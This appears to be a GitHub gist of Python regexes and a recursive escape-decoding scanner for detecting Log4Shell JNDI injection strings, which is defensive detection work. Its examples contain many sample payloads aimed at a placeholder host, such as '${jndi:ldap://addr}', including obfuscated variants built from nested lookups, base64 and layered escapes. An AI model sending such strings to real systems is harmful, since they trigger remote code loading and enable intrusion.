Skip to content

Instantly share code, notes, and snippets.

@EspressoCake
Forked from karanlyons/log4shell_regexes.py
Created December 14, 2021 02:53
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save EspressoCake/97164ec3eceb7e5af323d402cf61c97d to your computer and use it in GitHub Desktop.
Save EspressoCake/97164ec3eceb7e5af323d402cf61c97d to your computer and use it in GitHub Desktop.
log4shell Regexes
import re
from urllib.parse import unquote
# Flags shared by every detection regex: payloads may use any letter case and
# may span several lines.
FLAGS = re.IGNORECASE | re.DOTALL

# Each ESC_* fragment matches one literal character or one of its escaped
# spellings (\uXXXX, \xXX, octal, percent-encoding).
# ESC_DOLLAR used to contain an empty alternative (`||`), which made the
# dollar sign optional and let any bare `{...}` match the
# *_INCLUDING_ESCAPES* regexes.
ESC_DOLLAR = r'(?:\$|\\u0024|\\x24|\\0?44|%24)'
ESC_LCURLY = r'(?:\{|\\u007B|\\x7B|\\173|%7B)'
ESC_RCURLY = r'(?:\}|\\u007D|\\x7D|\\175|%7D)'

# Helpers that decide whether another decoding pass is worthwhile.
# Hex digits are matched in full (`a-f`, either case); the previous class
# `[0-9af]` rejected escapes such as `%7B` or `\x7d`.
# NOTE: `[0-7]{,3}` also accepts zero digits, so any backslash at all is
# treated as a potential escape sequence.
_BACKSLASH_ESCAPE_RE = re.compile(
    r'\\(?:u[0-9a-f]{4}|x[0-9a-f]{2}|[0-7]{,3})',
    flags=re.IGNORECASE,
)
_PERCENT_ESCAPE_RE = re.compile(r'%[0-9a-f]{2}', flags=re.IGNORECASE)

# Simple exploitation
SIMPLE_RE = re.compile(
    r'\$\{\s*jndi\s*:.*\}',
    flags=FLAGS,
)

# Simple exploitation involving escaped content (e.g., \u006a, \156, \x64, %69)
SIMPLE_WITH_ESCAPED_CONTENT_RE = re.compile(
    r'\$\{.*(?:\\|%).*\}',
    flags=FLAGS,
)

# Nested templating
NESTED_RE = re.compile(
    r'\$\{.*\$\{.*\}.*\}',
    flags=FLAGS,
)

# Nested templating, including escaped characters
NESTED_INCLUDING_ESCAPES_RE = re.compile(
    r'(?:' + ESC_DOLLAR + ESC_LCURLY + r'.*){2}' + ESC_RCURLY + r'.*' + ESC_RCURLY,
    flags=FLAGS,
)

# Any ${} tokens
ANY_RE = re.compile(
    r'\$\{.*\}',
    flags=FLAGS,
)

# Any ${} tokens, including escaped characters
ANY_INCLUDING_ESCAPES_RE = re.compile(
    ESC_DOLLAR + ESC_LCURLY + r'.*' + ESC_RCURLY,
    flags=FLAGS,
)

# Any of the above, but with an unterminated token (`${jndi:addr`).
# Every detection pattern ends with its closing-brace element, so appending
# `?` makes that final brace optional. Only the public detection regexes get
# a variant; the private helper regexes are skipped. The snapshot list keeps
# the namespace from changing while it is being iterated, and the suffix is
# sliced off (rather than `str.replace`d) so only the trailing `_RE` changes.
globals().update({
    _name[:-len('_RE')] + '_OPT_RCURLY_RE': re.compile(
        _regex.pattern + r'?',
        flags=FLAGS,
    )
    for _name, _regex in list(globals().items())
    if _name.endswith('_RE') and not _name.startswith('_')
})

# Name -> compiled pattern for every public detection regex, in definition
# order (base patterns first, then their *_OPT_RCURLY_RE variants).
regexes = {
    _name: _regex
    for _name, _regex in globals().items()
    if not _name.startswith('_') and _name.endswith('_RE')
}
def test(string):
    '''Run every regex in ``regexes`` against ``string``.

    Returns a dict mapping the name of each regex that found something to
    the match object it produced; regexes without a hit are left out, so an
    empty dict means nothing matched.
    '''
    searched = (
        (label, pattern.search(string))
        for label, pattern in regexes.items()
    )
    # ``search`` yields either a match object (always truthy) or None.
    return {label: found for label, found in searched if found}
def test_thorough(string):
    '''Scan string with all regexes, recursively decoding escape codes.

    The string is scanned with ``test``, then one layer of backslash escapes
    and/or percent-encoding is removed and the result is scanned again. This
    repeats for as long as decoding keeps making the string shorter.

    Returns a dict keyed by each intermediate form of the string that
    produced at least one hit; each value is the dict returned by ``test``
    for that form.
    '''
    last_string, matches = None, {}

    # Keep going only while the previous pass changed the string AND made it
    # shorter, which guarantees termination.
    while last_string != string and (
        last_string is None or len(last_string) > len(string)
    ):
        if match := test(string):
            matches[string] = match

        last_string = string

        if _BACKSLASH_ESCAPE_RE.search(string):
            try:
                # Going through Latin-1 with ``backslashreplace`` keeps
                # non-ASCII text intact: characters above U+00FF become
                # \u/\U escapes that ``unicode_escape`` turns straight back
                # into the same characters. A plain UTF-8 ``encode()`` here
                # would be re-read as Latin-1 and produce mojibake.
                string = (
                    string
                    .encode('latin-1', 'backslashreplace')
                    .decode('unicode_escape')
                )
            except UnicodeDecodeError:
                # Malformed escape (e.g. trailing backslash, truncated \x):
                # leave this layer undecoded instead of aborting the scan.
                pass

        if _PERCENT_ESCAPE_RE.search(string):
            string = unquote(string)

    return matches
# Public API: every detection regex by name, plus the two scanning helpers.
__all__ = [*regexes, 'test', 'test_thorough']
>>> from log4shell_regexes import *

>>> t = lambda s: [k for k in test(s)]
>>> tt = lambda s: [(k, list(v.keys())) for k, v in test_thorough(s).items()]

>>> t('${ jndi\t: addr\n}')
['SIMPLE_RE', 'ANY_RE', 'ANY_INCLUDING_ESCAPES_RE', 'SIMPLE_OPT_RCURLY_RE', 'ANY_OPT_RCURLY_RE', 'ANY_INCLUDING_ESCAPES_OPT_RCURLY_RE']

>>> t('${ jndi\t: addr\n')
['SIMPLE_OPT_RCURLY_RE', 'ANY_OPT_RCURLY_RE', 'ANY_INCLUDING_ESCAPES_OPT_RCURLY_RE']

>>> t('\044%7B\\44{env:NOTHING:-j}\u0024{lower:N}\\u0024{lower:${upper:d}}}i:addr}')
['SIMPLE_WITH_ESCAPED_CONTENT_RE', 'NESTED_RE', 'NESTED_INCLUDING_ESCAPES_RE', 'ANY_RE', 'ANY_INCLUDING_ESCAPES_RE', 'SIMPLE_WITH_ESCAPED_CONTENT_OPT_RCURLY_RE', 'NESTED_OPT_RCURLY_RE', 'NESTED_INCLUDING_ESCAPES_OPT_RCURLY_RE', 'ANY_OPT_RCURLY_RE', 'ANY_INCLUDING_ESCAPES_OPT_RCURLY_RE']

>>> t('${base64:d2hvIHRob3VnaHQgYW55IG9mIHRoaXMgd2FzIGEgZ29vZCBpZGVhPwo=}')
['ANY_RE', 'ANY_INCLUDING_ESCAPES_RE', 'ANY_OPT_RCURLY_RE', 'ANY_INCLUDING_ESCAPES_OPT_RCURLY_RE']

>>> t('%24%7Bjnd%24%7Bupper%3A%C4%B1%7D%3Aaddr%7D')
['NESTED_INCLUDING_ESCAPES_RE', 'ANY_INCLUDING_ESCAPES_RE', 'NESTED_INCLUDING_ESCAPES_OPT_RCURLY_RE', 'ANY_INCLUDING_ESCAPES_OPT_RCURLY_RE']

>>> t('$%7B\u006a\\156di:addr\\x7d')
['ANY_INCLUDING_ESCAPES_RE', 'ANY_INCLUDING_ESCAPES_OPT_RCURLY_RE']

>>> t('${jndi:${lower:l}${lower:d}a${lower:p}://$a{upper:d}dr}')
['SIMPLE_RE', 'NESTED_RE', 'NESTED_INCLUDING_ESCAPES_RE', 'ANY_RE', 'ANY_INCLUDING_ESCAPES_RE', 'SIMPLE_OPT_RCURLY_RE', 'NESTED_OPT_RCURLY_RE', 'NESTED_INCLUDING_ESCAPES_OPT_RCURLY_RE', 'ANY_OPT_RCURLY_RE', 'ANY_INCLUDING_ESCAPES_OPT_RCURLY_RE']

>>> t('${jndi:dns://addr}')
['SIMPLE_RE', 'ANY_RE', 'ANY_INCLUDING_ESCAPES_RE', 'SIMPLE_OPT_RCURLY_RE', 'ANY_OPT_RCURLY_RE', 'ANY_INCLUDING_ESCAPES_OPT_RCURLY_RE']

>>> t('${${base64:JHtqbmRpOmxkYXA6YWRkcn0=}}')
['NESTED_RE', 'NESTED_INCLUDING_ESCAPES_RE', 'ANY_RE', 'ANY_INCLUDING_ESCAPES_RE', 'NESTED_OPT_RCURLY_RE', 'NESTED_INCLUDING_ESCAPES_OPT_RCURLY_RE', 'ANY_OPT_RCURLY_RE', 'ANY_INCLUDING_ESCAPES_OPT_RCURLY_RE']

>>> t('${jndi:${lower:l}${lower:d}a${lower:p}://addr')
['SIMPLE_RE', 'NESTED_RE', 'NESTED_INCLUDING_ESCAPES_RE', 'ANY_RE', 'ANY_INCLUDING_ESCAPES_RE', 'SIMPLE_OPT_RCURLY_RE', 'NESTED_OPT_RCURLY_RE', 'NESTED_INCLUDING_ESCAPES_OPT_RCURLY_RE', 'ANY_OPT_RCURLY_RE', 'ANY_INCLUDING_ESCAPES_OPT_RCURLY_RE']

>>> t('${${::-j}nd${upper:ı}:rm${upper:ı}://addr}')
['NESTED_RE', 'NESTED_INCLUDING_ESCAPES_RE', 'ANY_RE', 'ANY_INCLUDING_ESCAPES_RE', 'NESTED_OPT_RCURLY_RE', 'NESTED_INCLUDING_ESCAPES_OPT_RCURLY_RE', 'ANY_OPT_RCURLY_RE', 'ANY_INCLUDING_ESCAPES_OPT_RCURLY_RE']

>>> t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//addr}')
['NESTED_RE', 'NESTED_INCLUDING_ESCAPES_RE', 'ANY_RE', 'ANY_INCLUDING_ESCAPES_RE', 'NESTED_OPT_RCURLY_RE', 'NESTED_INCLUDING_ESCAPES_OPT_RCURLY_RE', 'ANY_OPT_RCURLY_RE', 'ANY_INCLUDING_ESCAPES_OPT_RCURLY_RE']

>>> t('%5Cu002524%257Bjnd%2524%257Bupper%255Cu003a%255C%255C461%257D%253Aldap%253A%5C0452F%252Faddr%257D')
[]

>>> tt('%5Cu002524%257Bjnd%2524%257Bupper%255Cu003a%255C%255C461%257D%253Aldap%253A%5C0452F%252Faddr%257D')
[
	(
		'\\u002524%7Bjnd%24%7Bupper%5Cu003a%5C%5C461%7D%3Aldap%3A\\0452F%2Faddr%7D',
		['NESTED_INCLUDING_ESCAPES_RE', 'ANY_INCLUDING_ESCAPES_RE', 'NESTED_INCLUDING_ESCAPES_OPT_RCURLY_RE', 'ANY_INCLUDING_ESCAPES_OPT_RCURLY_RE']
	), (
		'${jnd${upper\\u003a\\\\461}:ldap://addr}',
		['SIMPLE_WITH_ESCAPED_CONTENT_RE', 'NESTED_RE', 'NESTED_INCLUDING_ESCAPES_RE', 'ANY_RE', 'ANY_INCLUDING_ESCAPES_RE', 'SIMPLE_WITH_ESCAPED_CONTENT_OPT_RCURLY_RE', 'NESTED_OPT_RCURLY_RE', 'NESTED_INCLUDING_ESCAPES_OPT_RCURLY_RE', 'ANY_OPT_RCURLY_RE', 'ANY_INCLUDING_ESCAPES_OPT_RCURLY_RE']
	), (
		'${jnd${upper:\\461}:ldap://addr}',
		['SIMPLE_WITH_ESCAPED_CONTENT_RE', 'NESTED_RE', 'NESTED_INCLUDING_ESCAPES_RE', 'ANY_RE', 'ANY_INCLUDING_ESCAPES_RE', 'SIMPLE_WITH_ESCAPED_CONTENT_OPT_RCURLY_RE', 'NESTED_OPT_RCURLY_RE', 'NESTED_INCLUDING_ESCAPES_OPT_RCURLY_RE', 'ANY_OPT_RCURLY_RE', 'ANY_INCLUDING_ESCAPES_OPT_RCURLY_RE']
	), (
		'${jnd${upper:ı}:ldap://addr}',
		['NESTED_RE', 'NESTED_INCLUDING_ESCAPES_RE', 'ANY_RE', 'ANY_INCLUDING_ESCAPES_RE', 'NESTED_OPT_RCURLY_RE', 'NESTED_INCLUDING_ESCAPES_OPT_RCURLY_RE', 'ANY_OPT_RCURLY_RE', 'ANY_INCLUDING_ESCAPES_OPT_RCURLY_RE']
	)
]
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment